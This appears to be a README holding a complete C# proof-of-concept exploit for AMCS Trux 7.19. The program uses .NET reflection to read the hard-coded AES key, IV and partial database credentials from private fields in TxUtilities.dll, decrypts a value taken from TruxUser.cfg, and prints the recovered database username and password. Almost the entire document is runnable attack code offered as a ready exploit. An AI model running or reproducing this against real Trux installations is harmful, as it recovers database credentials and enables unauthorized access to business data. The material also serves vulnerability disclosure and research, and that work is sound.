README.md
Rendering markdown...
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
namespace DLLReflectionLoader
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("=========================================================");
Console.WriteLine(" AMCS TRUX 7.19.0018 (219580057) Exploit Proof of Concept");
Console.WriteLine("=========================================================");
Console.WriteLine(" This Proof of Concept (POC) exploits an undisclosed");
Console.WriteLine(" vulnerability in the AMCS Trux application. It is");
Console.WriteLine(" designed to derive encrypted database credentials");
Console.WriteLine(" and hard-coded decryption keys.");
Console.WriteLine(" Author: Bryan Smith, Redline Cyber Security");
Console.WriteLine(" CONFIDENTIAL USE ONLY");
Console.WriteLine("==============================================\n");
// Load the assembly
Console.WriteLine("Loading TxUtilities.dll...");
Assembly assembly = Assembly.LoadFrom("TxUtilities.dll");
// Get the type of the class
Console.WriteLine("Accessing TxUtilities.Database class...");
Type type = assembly.GetType("TxUtilities.Database"); // Adjust the namespace and class name as necessary
if (type == null)
{
Console.WriteLine("ERROR: Class not found.");
return;
}
// Create an instance of the class
Console.WriteLine("Creating an instance of the class...");
object classInstance = Activator.CreateInstance(type);
// Access and output values of the private fields
Console.WriteLine("Retrieving DB User...");
string fieldValue3 = GetPrivateFieldValue<string>(type, classInstance, "\u0003");
Console.WriteLine("DB User retrieved: " + fieldValue3);
Console.WriteLine("Retrieving DB Password (Prefix)...");
string fieldValue5 = GetPrivateFieldValue<string>(type, classInstance, "\u0005");
Console.WriteLine("DB Password (Prefix): " + fieldValue5);
// Read the text file and extract the base64 value
Console.WriteLine("Extracting Base64 value from TruxUser.cfg...");
string base64Value = ExtractBase64Value("TruxUser.cfg");
Console.WriteLine("Config Ciphertext (Base64): " + base64Value);
// Access private fields for IV and KEY
Console.WriteLine("Retrieving AES IV...");
byte[] fieldValueIV = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001A");
Console.WriteLine("AES IV: " + BitConverter.ToString(fieldValueIV));
Console.WriteLine("Retrieving AES KEY...");
byte[] fieldValueKey = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001B");
Console.WriteLine("AES KEY: " + BitConverter.ToString(fieldValueKey));
// Decrypt the ciphertext
Console.WriteLine("Decrypting ciphertext...\n\n");
byte[] cipherTextBytes = Convert.FromBase64String(base64Value);
string decryptedText = DecryptStringFromBytes_Aes(cipherTextBytes, fieldValueKey, fieldValueIV);
// Remove null bytes from the decrypted text
string cleanedText = decryptedText.Replace("\0", string.Empty);
// Output combined Database Password
Console.WriteLine("Database User : [" + fieldValue3 + "]");
Console.WriteLine("Database Password: [" + fieldValue5 + cleanedText + "]");
// Method to get private field value of a specified type
T GetPrivateFieldValue<T>(Type targetType, object instance, string fieldName)
{
FieldInfo fieldInfo = targetType.GetField(fieldName, BindingFlags.NonPublic | BindingFlags.Instance);
T fieldValue = (T)fieldInfo.GetValue(instance);
return fieldValue;
}
Console.WriteLine("\n\nEXPLOIT COMPLETE");
Console.WriteLine("Press any key to exit...");
Console.ReadKey();
}
static string ExtractBase64Value(string fileName)
{
try
{
string line;
using (StreamReader file = new StreamReader(fileName))
{
while ((line = file.ReadLine()) != null)
{
if (line.StartsWith("EP_TC10 :"))
{
return line.Split(':')[1].Trim();
}
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error reading file: " + ex.Message);
}
return null;
}
static string DecryptStringFromBytes_Aes(byte[] cipherText, byte[] Key, byte[] IV)
{
// Declare the string used to hold the decrypted text.
string plaintext = null;
using (Aes aesAlg = Aes.Create())
{
aesAlg.Key = Key;
aesAlg.IV = IV;
// Create a decryptor to perform the stream transform.
ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
// Create the streams used for decryption.
using (MemoryStream msDecrypt = new MemoryStream(cipherText))
{
using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
{
using (StreamReader srDecrypt = new StreamReader(csDecrypt))
{
// Read the decrypted bytes from the decrypting stream and place them in a string.
plaintext = srDecrypt.ReadToEnd();
}
}
}
}
return plaintext;
}
}
}